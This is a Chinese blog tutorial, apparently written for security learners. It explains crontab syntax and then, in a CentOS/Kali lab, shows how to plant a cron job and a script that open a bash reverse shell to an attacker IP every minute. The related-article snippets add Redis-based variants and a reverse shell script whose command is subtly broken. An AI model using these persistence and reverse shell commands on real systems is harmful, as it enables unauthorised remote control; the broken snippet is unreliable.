linux定时计划反弹shell

最新推荐文章于 2025-03-11 15:16:27 发布
最新推荐文章于 2025-03-11 15:16:27 发布
阅读量2.8k 收藏 3
点赞数
分类专栏: 计算机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/niqiu320/article/details/117304214
版权

crontab

crontab命令常见于Unix和Linux的操作系统之中,用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于“crontab”文件中,以供之后读取和执行。通常,crontab储存的指令被守护进程激活。crond 常常在后台运行,每一分钟检查是否有预定的作业需要执行。这类作业一般称为cron jobs。

安装(默认自带crontab)

yum -y install vixie-cron
yum -y install crontabs

说明:
vixie-cron 软件包是 cron 的主程序;
crontabs 软件包是用来安装、卸装、或列举用来驱动 cron 守护进程的表格的程序。

配置

cron 是 linux 的内置服务,但它不自动起来,可以用以下的方法启动、关闭这个服务:

service crond start     //启动服务
service crond stop      //关闭服务
service crond restart   //重启服务
service crond reload    //重新载入配置
service crond status    //查看crontab服务状态

前四行是用来配置 cron 任务运行环境的变量。
SHELL 变量的值告诉系统要使用哪个 shell 环境(在这个例子里是 bash shell);
PATH 变量定义用来执行命令的路径。
cron 任务的输出被邮寄给 MAILTO 变量定义的用户名。
如果 MAILTO 变量被定义为空白字符串(MAILTO=""),电子邮件就不会被寄出。
HOME 变量可以用来设置在执行命令或脚本时使用的主目录。

crontab 命令

功能:设置计时器。

语法:crontab[-u <用户名称>][配置文件] 或 crontab [-u <用户名称>][-elr]
解释:cron 是一个常驻服务,它提供计时器的功能,让用户在特定的时间得以执行预设的指令或程序。只要用户会编辑计时器的配置文件,就可以使 用计时器的功能。其配置文件格式如下:Minute Hour Day Month DayOFWeek Command

参数:
-e 编辑该用户的计时器设置。
-l 列出该用户的计时器设置。
-r 删除该用户的计时器设置。
-u<用户名称>  指定要设定计时器的用户名称。

格式:

*   *  *  *  *  command
分 时 日 月 周  命令

第1列表示分钟1~59 每分钟用*或者 */1表示
第2列表示小时1~23(0表示0点)
第3列表示日期1~31
第4列表示月份1~12
第5列标识号星期0~6(0表示星期天)
第6列要运行的命令

例子:

*/5 * * * * root ab -n 2000 http://60.217.229.252/250k.jpg
上面例子表示每5分钟模拟用户访问http://60.217.229.252/250k.jpg 2000次

30 21 * * * /usr/local/etc/rc.d/lighttpd restart
上面的例子表示每晚的21:30重启apache。

45 4 1,10,22 * * /usr/local/etc/rc.d/lighttpd restart
上面的例子表示每月1、10、22日的4 : 45重启apache。

10 1 * * 6,0 /usr/local/etc/rc.d/lighttpd restart
上面的例子表示每周六、周日的1 : 10重启apache。

0,30 18-23 * * * /usr/local/etc/rc.d/lighttpd restart
上面的例子表示在每天18 : 00至23 : 00之间每隔30分钟重启apache。

0 23 * * 6 /usr/local/etc/rc.d/lighttpd restart
上面的例子表示每星期六的11 : 00 pm重启apache。

* */1 * * * /usr/local/etc/rc.d/lighttpd restart
每一小时重启apache

* 23-7/1 * * * /usr/local/etc/rc.d/lighttpd restart
晚上11点到早上7点之间,每隔一小时重启apache

0 11 4 * mon-wed /usr/local/etc/rc.d/lighttpd restart
每月的4号与每周一到周三的11点重启apache

0 4 1 jan * /usr/local/etc/rc.d/lighttpd restart
一月一号的4点重启apache

*/30 * * * * /usr/sbin/ntpdate 210.72.145.44
每半小时同步一下时间

反弹shell

1.被攻击者:Centos 192.168.20.131

2.攻击者:kali 192.168.20.133

首先我们打开etc/crontab

在这里插入图片描述
可以看到shell=/bin/bash,这里不需要任何修改

方法一:

通过执行下面的语句,即可进入类似于vi的文本编辑器界面,我们可以通过在上面誊写上面那种时程表定时调用某个脚本。
在这里插入图片描述
写入bash

* * * * * bash -i >& /dev/tcp/192.168.20.133/8888  0>&1

注意这里必须是上面的软链接/bin/bash,如果其他的如:/bin/sh等要修改为bash
也可以不进行修改,写一个shell脚本,然后调用脚本

方法二:

1.创建shell文件
例如在/etc/crontabshell
vi crontabshell

#!/bin/bash
bash -i >& /dev/tcp/192.168.20.133/8888  0>&1

2.crontab -e
写入

* * * * * /etc/crontabshell

在这里插入图片描述
*为时间设置,具体自己随意设置即可

结果
在这里插入图片描述
成功反弹

Ubuntu使用crontab使用反弹shell问题处理
SHELLCODE_8BIT的博客
12-15 1086
原因是在ubuntu下crontab启动默认使用dash来启动,而在dash启动会失败,我们可以来尝试一下。使用dash启动,会直接报如下错误。在ubuntu环境下做攻击时,会遇到下列情况,使用crontab写入如下命令反弹,会失败。ubuntu反弹SHELL正确用法是。
linux反弹shell检测和溯源,Wazuh联动osquery检测linux反弹shell
weixin_39820136的博客
05-14 1239
用osquery根据制定的规则定时检测系统并生成包含查询结果的日志文件,wazuh再对这些日志文件进行解析之后匹配规则告警。osquery下载安装的过程就略过了。这里简单介绍下osquery,详细请参考官方文档文件结构/etc/osquery//usr/share/osquery/osquery.example.conf/usr/share/osquery/lenses/{*}.aug/usr/s...
linux 定时任务 crontab 反弹 shell
weixin_30699463的博客
06-26 1670
日期:2018-11-26 13:47:34 介绍:如何使用定时任务反弹 shell? 0x01、 基本命令 参数 -e:编辑该用户的计时器设置; -l:列出该用户的计时器设置; -r:删除该用户的计时器设置; -u <用户名称>:指定要设定计时器的用户名称。 MAC 直接使用 crontab -e 无效: 编辑 username 的 cr...
计划任务反弹Shell命令在不同Linux系统的区别
最新发布
smile_3779的博客
03-11 729
在文件中(目录下可以放置额外的Crontab文件)Debian和Ubuntu:/var/spool/cron/crontabs/
linux设置定时弹框,【奇技淫巧】linux 定时任务 crontab 反弹 shell
weixin_39736047的博客
05-14 340
日期:2018-11-26 13:47:34介绍:如何使用定时任务反弹 shell?0x01、 基本命令参数-e:编辑该用户的计时器设置;-l:列出该用户的计时器设置;-r:删除该用户的计时器设置;-u :指定要设定计时器的用户名称。MAC 直接使用 crontab -e 无效:编辑 username 的 crontab$ sudo crontab -u username -e列出 userna...
Shell编程_定时反弹shell
soldi_er的博客
04-20 932
文章目录Shell编程hello反弹shellcrontab命令cron介绍使用crontab本地测试 Shell编程 hello   #!符号的作用是告诉操作系统,解释该脚本文件需要的的解释器和相应参数,比如-v是打印程序的源代码。 脚本内容: #!/bin/bash echo "hello, shell" 赋予执行权限:chmod +x test.sh 执行命令: ./test.sh、 或bash test.sh、 或source test.sh 反弹shell   反弹she
ubuntu的任务计划反弹shell
m0_65540912的博客
06-30 544
在实现的过程中,发现ubuntu靶机没有nc,无法用nc命令执行反弹的命令,而且执行计划任务的用户是什么,反弹过去的用户是一样的。
五、利用redis计划任务反弹shell
dahege666的博客
03-02 2510
一、测试环境 靶机 centos7 192.168.1.27 攻击机 kali 192.168.1.138 二、测试过程 1.先用kali监听接收shell的端口: 2.连接redis,创建一个key x,值为反弹shell语句,修改备份目录为linux计划任务目录,修改备份文件名为 root,以root身体执行计划任务 3.执行完后回到监听终端页面,但是反弹的...
2021-8-1Redis计划任务反弹shell
qq_45290991的博客
08-01 2364
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。 一、搭建安装配置Redis数据库 我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行 ...
全面掌握Linux提权技巧与反弹shell脚本
- 反弹Shell是一种远程访问技术,攻击者通过在目标机器上执行特定命令来创建一个逆向连接。 - 在反弹Shell脚本中,通常需要设置监听端口和IP地址,并将这些信息嵌入到Shell代码中。 - 常见的反弹Shell脚本语言...
Linux反弹Shell
m0_73199983的博客
03-06 1594
被控端主动发起连接请求连接控制,通常被控制端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收送过来的数据包。被控端bash -i>&/dev/tcp/192.168.81.154(控制端IP)/6666 (控制端想要开放的端口号)0>&1bash -i打开一个交互式的bash shell。>&或者&>>&、&>:混合输出(正确、错误的输出都输出到一个地方),将标准输出、错误输出全都重定向到 /dev/tcp/HOST/PORT,即控制端如果不想用>&或者。
Linux环境下的shell反弹
qq_55213436的博客
07-05 2159
在日常的渗透测试中,当我们拿到一个目标网站的漏洞的时候,往往可以采用shell反弹的方式来进行下一步的操作。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。一般的shell反弹可以结合命令执行漏洞来实现。......
linux反弹shell方法
weixin_53747497的博客
07-12 2374
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6598
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5995
redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
Linux常用的反弹shell命令
m0_63200360的博客
04-24 3817
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
入侵redis之准备---Linux关于定时任务crontab相关知识了解配合理解shell反弹远程控制
guijianchouxyz的博客
11-25 1017
【1】crontab一般来说服务器都是有的,依赖crond服务,这个服务也是必须安装的服务,并且也是开机自启动的服务,也就是说,他基本上是一直在启动着的,至少小编这么多年的运维经验,每台服务器上面都有这个服务并且是正常启动的【2】好多的服务都需要依赖这个服务,比如定时清理日志脚本,定时磁盘检查,配合监控,流量排查甚至还有一些高级命令。比如sar命令,syslog日志轮询都是要依赖这个服务的以上两点,小编想表达的意思是是crontab这个服务很重要。
crontab命令使用记录(精,反弹shell
墨痕诉清风的博客
11-24 2404
1. 编辑定时任务 crontab -e linux通用路径:/etc/crontab ubuntu被编辑的文件路径一般为:/var/spool/cron/当前用户 centos被编辑的文件路径一般为:/var/spool/cron/当前用户 2. 删除定时任务(情况) crontab -r 3. 查看现有定时任务 crontab -l 4. crountab 定时任务规则编写 */5 * * * * Command 每5分钟执行一次命...
网络安全-shire写任务计划反弹shell、写私钥、反序列化
m0_68976043的博客
09-18 798
我们经过前面文章很清楚知道,shiro是将数据存储在内存当中,内存落盘实现一个数据存储,而当其结合python,python将登录的session存储到shiro里面就会造成一个反序列化漏洞看看环境登录信息存到session序列化一个引擎序列化存入那我们就需要反序列化的方式取出pass:python序列化的两个方法pickle.dumps、pickle.loads。
反弹shell的vps
02-26
### 配置VPS以实现反弹Shell的安全测试 #### 选择合适的VPS服务提供商 为了进行安全测试,建议选择信誉良好的云服务商来部署VPS实例。这些平台通常提供稳定的服务质量以及灵活的配置选项。 #### 安全加固VPS环境 在启动任何操作之前,务必确保VPS本身已经过适当的安全强化处理。这包括但不限于更新操作系统补丁、安装必要的防护软件(如防火墙)、关闭不必要的端口和服务等措施[^2]。 #### 设置监听程序 对于Linux VPS而言,可以利用`nc`(netcat)工具作为简易的TCP/UDP连接器来进行数据传输。具体做法是在目标机器上运行带有特定参数组合后的命令行版本netcat等待来自客户端发起的请求连接并保持会话交互状态直到一方主动断开为止。 ```bash nc -lvnp 4444 ``` 上述指令将在本地开启一个监听于4444端口上的服务器模式进程[^1]。 #### 编写反弹Shell脚本 创建一个新的shell脚本来定义远程主机向指定IP地址及端口号发送反向连接请求的动作逻辑。下面给出了一种基于Bash语法结构下的简单实现方式: ```bash #!/bin/bash export RHOST="your_vps_ip" export RPORT=4444 bash -i >& /dev/tcp/$RPORT 0>&1 ``` 此段代码片段实现了通过TCP协议将当前终端的标准输入输出重定向至由变量`$RHOST`和`$RPORT`所共同指向的目的地位置从而建立起一条双向通信管道的效果[^4]。 #### 计划任务自动化执行 如果希望定期触发该行为,则可借助cron表达式配合crontab文件完成周期性的调度安排工作。编辑用户的个人定时作业列表后追加一行记录如下所示即可满足需求: ```bash * * * * * /path/to/reverse_shell.sh >/dev/null 2>&1 ``` 这里假设每分钟重复一次整个过程,并且忽略所有可能产生的标准错误流输出信息以防日志文件迅速膨胀造成磁盘空间不足等问题发生。 #### 注意事项 - **合法性验证**:始终确认已获得授权许可才能开展任何形式的渗透活动; - **最小权限原则**:尽可能减少赋予测试账号过多的操作权利范围以免意外引发更严重的后果; - **痕迹清理机制**:结束后记得移除临时添加过的组件或更改过的设定项恢复初始状况防止留下安全隐患; - **合规性考量**:遵循当地法律法规要求不得从事非法入侵他人计算机系统的违法行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值